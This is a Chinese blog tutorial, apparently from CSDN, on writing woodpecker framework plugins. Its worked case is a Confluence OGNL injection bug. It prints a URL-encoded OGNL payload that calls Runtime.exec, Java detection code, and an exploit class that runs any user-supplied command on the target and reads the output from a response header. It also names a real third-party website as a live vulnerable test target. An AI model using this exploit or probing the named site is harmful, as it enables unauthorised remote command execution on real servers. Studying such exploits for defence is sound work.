POC & EXP | woodpecker插件编写

于 2024-06-16 12:03:56 发布
阅读量1k 收藏 22
点赞数 32
分类专栏: 红队 文章标签: POC EXP woodpecker插件编写 插件 woodpecker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45305211/article/details/139717906
版权

woodpecker插件编写

目录

woodpecker介绍

woodpecker-framework是一款漏洞精准检测深度利用框架,只做一件事:精准狙击高危漏洞

针对人群:专业打点人士。

  • 目标探测
  • 精准检测
  • 深度利用
  • 荷载生成

在这里插入图片描述

woodpecker使用

java -jar woodpecker-framework.1.3.5.jar

运行之后,会自动生成common、config.db、plugin

在这里插入图片描述

plugin用来存放woopecker插件。

插件编写

安装环境

woodpecker-sdk

woodpecker-sdkwoodpecker-framework的开发SDK,里面定义了woodpecker-framework开放的接口。 开发者可以通过接口编写插件实现自己想要的功能。

下载下来,解压,使用IDE打开项目,点击右侧“install”。

在这里插入图片描述

woodpecker-request

woodpecker-requests是基于 requests 为woodpecker框架定制开发的httpclient库,目的是编写插件时能拥有像python requests一样的便利。特点为可以全局设置代理、全局设置UA等

下载下来,解压,使用IDE打开项目,点击右侧“install”。

在这里插入图片描述

创建Maven项目

在这里插入图片描述

在这里插入图片描述

    <dependencies>
        <dependency>
            <groupId>me.gv7.woodpecker</groupId>
            <artifactId>woodpecker-sdk</artifactId>
            <version>0.3.0</version>
        </dependency>
        <dependency>
            <groupId>me.gv7.woodpecker</groupId>
            <artifactId>woodpecker-requests</artifactId>
            <version>0.2.0</version>
        </dependency>
    </dependencies>

Confluence OGNL表达式注入漏洞插件编写

创建Package包和Class类

创建Package包

  • exploit
  • pocs
  • utils

和Class类

  • ConfluenceVulPlugin(不固定,和漏洞名相关)
  • WoodpeckerPluginManager整个程序的入口
  • ConfluenceOgnlPoc(不固定,和漏洞名相关)
  • ConfluenceOgnlExp(不固定,和漏洞名相关)

在这里插入图片描述

编写POC

漏洞POC

http://IP地址 /${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(" echo 'ognlinject' ").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(" X-Response ",#a))}/

进行url编码为:

/$%7B(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec( %22echo%20'ognlinject'%22 ).getInputStream(),%22utf-8%22)).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(%22 X-Response %22,#a))%7D/

代码编写

WoodpeckerPluginManager类:(整个插件的入口)

package me.gv7.woodpecker.plugin;

// IPluginManager接口由woodpecker-sdk提供
public class WoodpeckerPluginManager implements IPluginManager{
    @Override
    public void registerPluginManagerCallbacks(IPluginManagerCallbacks iPluginManagerCallbacks) {
        // 注册漏洞插件
        iPluginManagerCallbacks.registerVulPlugin( new ConfluenceVulPlugin() );
    }
}

ConfluenceVulPlugin类:(具体的漏洞插件类)

package me.gv7.woodpecker.plugin;

import me.gv7.woodpecker.plugin.exploit.ConfluenceOgnlExp;
import me.gv7.woodpecker.plugin.pocs.ConfluenceOgnlPoc;

import java.util.ArrayList;
import java.util.List;

// IVulPlugin接口由woodpecker-sdk提供
public class ConfluenceVulPlugin implements IVulPlugin{

    public static IVulPluginCallbacks callbacks;
    public static IPluginHelper pluginHelper;
    @Override
    public void VulPluginMain(IVulPluginCallbacks iVulPluginCallbacks) {
        this.callbacks = iVulPluginCallbacks;
        this.pluginHelper = iVulPluginCallbacks.getPluginHelper();

        iVulPluginCallbacks.setVulPluginName("Confluence OGNL表达式注入漏洞POC"); // 插件名字
        iVulPluginCallbacks.setVulPluginAuthor("L3yia"); // 作者名
        iVulPluginCallbacks.setVulPluginVersion("1.0.0"); // 插件版本
        iVulPluginCallbacks.setVulName("Confluence OGNL表达式注入漏洞"); // 漏洞名称
        iVulPluginCallbacks.setVulDescription("Confluence OGNL表达式注入漏洞"); // 漏洞描述

        // 注册漏洞验证模块
        iVulPluginCallbacks.registerPoc(new ConfluenceOgnlPoc());

        // 注册漏洞利用模块(利用模块可以有多个)
        List<IExploit> exploitList = new ArrayList();
        exploitList.add(new ConfluenceOgnlExp());
        iVulPluginCallbacks.registerExploit(exploitList);
    }
}

ConfluenceOgnlPoc类:

package me.gv7.woodpecker.plugin.pocs;

import me.gv7.woodpecker.plugin.*;
import me.gv7.woodpecker.requests.RawResponse;
import me.gv7.woodpecker.requests.Requests;

import java.util.HashMap;
import java.util.Map;
import java.util.Objects;

public class ConfluenceOgnlPoc implements IPoc {
    @Override
    public IScanResult doVerify(ITarget iTarget, IResultOutput iResultOutput) throws Throwable {
        // 创建输出模块,用作结果的输出
        IScanResult scanResult = ConfluenceVulPlugin.pluginHelper.createScanResult();
        // 设置目标地址,iTarget.getAddress()由插件面板获取地址
        scanResult.setTarget(iTarget.getAddress());
        // 调用漏洞验证函数
        Map<String, Object> responseMap = checkConfluenceOgnl(iTarget.getAddress());

        scanResult.setExists((Boolean) responseMap.get("flag"));
        scanResult.setMsg((String) responseMap.get("results"));

        iResultOutput.infoPrintln((String) responseMap.get("results"));
        return scanResult;
    }
    
    // 漏洞验证函数
    private Map<String, Object> checkConfluenceOgnl(String address){
        Map<String,Object> responseMap = new HashMap<>();
        boolean flag = false;
        String results  = null;
        try {
            /*
                Requests.get()发送一个get请求(验证漏洞的POC)。
                verify(false) : 忽略https证书失效
                timeout(3000) : 超时时间3000毫秒
                send() : 发送
            */
            RawResponse response = Requests.get(address + "/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22 echo%20'ognlinject' %22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Response%22%2C%23a%29%29%7D/").verify(false).timeout(3000).send();
            String header = response.getHeader("X-Response");
            if(response.statusCode() == 302 && header.contains("ognlinject")){
                flag = true;
                results = String.format("%s存在命令注入漏洞!!!",address);
            }else {
                flag = false;
                results = String.format("%s不存在命令注入漏洞",address);
            }

        }catch (Exception e){
            flag = false;
            results = String.format("%s不存在命令注入漏洞",address);
        }finally {
            // 设置responseMap的值,将flag和results带回去
            responseMap.put("flag",flag);
            responseMap.put("results",results);
        }
        // 返回
        return responseMap;
    }
}

导出jar包

点击“package”生成jar包:

在这里插入图片描述

在这里插入图片描述

将jar包放入woodpecker的plugin目录

在这里插入图片描述

运行woodpecker测试

在这里插入图片描述

测试网址:此网址存在该漏洞

https://confluence.startwire.com

在这里插入图片描述

编写EXP

代码编写

ConfluenceOgnlExp类:

package me.gv7.woodpecker.plugin.exploit;

import me.gv7.woodpecker.plugin.*;
import me.gv7.woodpecker.requests.RawResponse;
import me.gv7.woodpecker.requests.Requests;

import java.net.URLEncoder;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;

public class ConfluenceOgnlExp implements IExploit {
    @Override
    public String getExploitTabCaption() {
        return "代码执行";  // 选项名称
    }

    // 接收用户参数
    @Override
    public IArgsUsageBinder getExploitCustomArgs() {
        IArgsUsageBinder argsUsageBinder = ConfluenceVulPlugin.pluginHelper.createArgsUsageBinder();
        List<IArg> args = new ArrayList<>();

        IArg command = ConfluenceVulPlugin.pluginHelper.createArg();
        command.setDescription("执行的命令");
        command.setName("Command");
        command.setDefaultValue("whoami");
        command.setRequired(true);  // 必填
        args.add(command);
        argsUsageBinder.setArgsList(args);
        return argsUsageBinder;
    }

    @Override
    public void doExploit(ITarget iTarget, Map<String, Object> map, IResultOutput iResultOutput) throws Throwable {
        try {
            String command = (String) map.get("Command");
            command = URLEncoder.encode(command);
            String address = iTarget.getAddress();
            RawResponse response = Requests.get(address + "/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22"+command+"%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Response%22%2C%23a%29%29%7D/").verify(false).timeout(3000).send();
            if (response.statusCode() == 302){
                String responseHeader = response.getHeader("X-Response");
                iResultOutput.successPrintln(responseHeader);
            }else{
                iResultOutput.failPrintln("执行失败了~");
            }
        }catch (Exception e){
            iResultOutput.failPrintln("执行异常了~");
        }
    }
}

运行woodpecker测试

在这里插入图片描述

在这里插入图片描述

_leyilea
关注
  • 32
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
全网优秀的攻防渗透工具总结
lza20001103的博客
09-21 2321
全网优秀的攻防渗透工具总结 文章目录全网优秀的攻防渗透工具总结半/全自动化利用工具资产发现工具子域名收集工具目录扫描工具指纹识别工具端口扫描工具信息泄露利用工具漏洞扫描框架/工具中间件漏洞利用工具重点CMS利用工具常规漏洞利用工具数据库利用工具爆破工具字典收集 首先恭喜你发现了宝藏。本项目集成了全网优秀的攻防武器项目,包含信息收集工具(自动化利用工具、资产发现工具、目录扫描工具、子域名收集工具…etc…),漏洞利用工具(各大CMS利用工具、中间件利用工具等项目),内网渗透工具、应急响应工具、甲方运维工具、等
Vulnerabilities:漏洞PoCExp收集; Vulnerabilities PoC & Exp collections
05-25
针对Windows的PoC很多会被杀毒软件拦截,此为正常现象,请自行斟酌是否下载,如果有带有后门的exp,请通过提交issue联系我。 Windows Microsoft Windows SMB远程代码执行漏洞(永恒之蓝) Microsoft IIS 6.0 远程...
Some-PoC-oR-ExP:各种漏洞pocExp的收集或编写
04-28
各种漏洞PoCExP的收集或编写 个人偶尔整理收集,仅为安全研究提供参考~ 请勿用于实施违法行为,如由您使用不当引起的法律⻛险,由您⾃主承担~ 一些POC来源
SecGPT、情报推送、内部单兵武器库名额免费送
Ms08067安全实验室
05-28 58
点击星标,即时接收最新推文往期回顾第十期红队课程圆满结束,讲师跟学员氛围融洽,讲师耐心在线答疑,一次付费终身学习。红队课程主打一手实战经验教学,一百多个项目积攒下的红队战术思路分享,不止是技术和方法,更多的是红队思维战术。红队十期学员群内学员们互相交流学习心得,学习氛围轻松愉快新的一期我们增加了社会工程学中的近缘渗透、社会工程学中的钓鱼、多级代理实战技术等课程,并且增加近10节录播课程,包括C++...
红队十一期,4月28号正式开班(报名送内部单兵武器库)
Ms08067安全实验室
04-27 60
点击星标,即时接收最新推文往期回顾第十期红队课程圆满结束,讲师跟学员氛围融洽,讲师耐心在线答疑,一次付费终身学习。红队课程主打一手实战经验教学,一百多个项目积攒下的红队战术思路分享,不止是技术和方法,更多的是红队思维战术。红队十期学员群内学员们互相交流学习心得,学习氛围轻松愉快新的一期我们增加了社会工程学中的近缘渗透、社会工程学中的钓鱼、多级代理实战技术等课程,并且增加近10节录播课程,包括C++...
红队十一期(报名送单兵武器库)
Ms08067安全实验室
04-24 42
点击星标,即时接收最新推文往期回顾第十期红队课程圆满结束,讲师跟学员氛围融洽,讲师耐心在线答疑,一次付费终身学习。红队课程主打一手实战经验教学,一百多个项目积攒下的红队战术思路分享,不止是技术和方法,更多的是红队思维战术。红队十期学员群内学员们互相交流学习心得,学习氛围轻松愉快新的一期我们增加了社会工程学中的近缘渗透、社会工程学中的钓鱼、多级代理实战技术等课程,并且增加近10节录播课程,包括C++...
POC&EXP编写指南.rar
02-11
POC&EXP编写指南》是一份非常实用的资料,主要涵盖了网络安全领域中的Proof of Concept(POC)和Exploit(EXP)的编写方法。在网络安全研究中,POC是证明某一安全漏洞存在的一种技术性验证,而EXP则是利用这个漏洞...
基于python编写的Web安全检测PoC&&EXP框架+源码+开发文档+代码解析(毕业设计&课程设计&项目开发)
04-22
基于python编写的Web安全检测PoC&&EXP框架+源码+开发文档+代码解析,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 基于python编写的Web安全检测PoC&&EXP框架+...
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用)
11-07
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用) [网上流传版]MS12-020 PoC[bug修正版 + 数据包nc发送版] [个人版]ms12-020 Ruby,Python,EXE,DAT,NC一应俱全
Scratch自制:《袁坤》1.0版本半成品公开展示、测试
最新发布
07-17
Scratch自制:袁坤1.0版本半成品公开展示、测试 由作者制作的另一款C++游戏:文字版《袁坤》改编的同名之作,内容丰富,将在C++版本的基础上进行做出些许改动,并不断创新,使游戏内容、剧情更加生动。 ——袁神派蒙“工作室” Ps:作者饼画的很大,后续将游戏完全制作完成可能还需要一段时间,Because作者是学生,前段时间刚分班考完,才腾出的时间进行创作,再次感谢粉丝们对袁神派蒙的支持!
出入库报表(实时库存)-Excel 模版
07-17
【作品名称】:出入库报表(实时库存)-Excel 模版 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
basemap-1.1.0-cp36-cp36m-win_amd64.whl
07-17
basemap-1.1.0-cp36-cp36m-win_amd64.whl
popt-devel-1.18-8.el9.i686
07-17
popt-devel-1.18-8.el9.i686
torchaudio-2.0.1+cpu-cp39-cp39-win_amd64.whl
07-17
torchaudio软件包,直接下载下来,通过命令窗口输入:pip install torchaudio-xxx.whl安装就行,再也不怕pip安装timeout了
H公司-任职资格体系的建立.docx
07-17
H公司-任职资格体系的建立.docx
电脑桌面右下角图标重新显示
07-17
电脑用久了,桌面右下角图标不显示,用这个工具可以重新找回来。
【虹膜识别】基于matlab Daughman算法分割虹膜识别【含Matlab源码 5132期】.mp4
07-17
Matlab研究室上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
如何画那种POC或者exp脚本的旗标
06-08
通常来说,POC或者Exp脚本的旗标是一个独特的图标,用于识别该脚本的作者或者出处。这种图标通常包括一个logo或者标志,以及相关的文本信息。对于如何画这种旗标,我提供以下的建议: 1. 确定旗标的主题和风格。你可以考虑使用一些与安全相关的元素,比如锁,盾牌,电子电路等等,同时也可以考虑使用一些醒目的颜色和字体来增加可识别性。 2. 使用专业的绘图工具,比如Adobe Illustrator或者Inkscape,来创建旗标的设计。这些工具可以帮助你创建矢量图形,以确保旗标在不同的尺寸和分辨率下都能够保持清晰和清晰可识别。 3. 如果你不熟悉使用绘图工具,也可以考虑使用在线图标生成器来创建旗标。这些网站通常提供一些现成的图标和模板,让你可以根据自己的需要进行修改和调整。 总之,画一个POC或者Exp脚本的旗标需要一定的设计和创意能力,同时也需要使用一些专业的工具来确保旗标的可识别性和清晰度。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值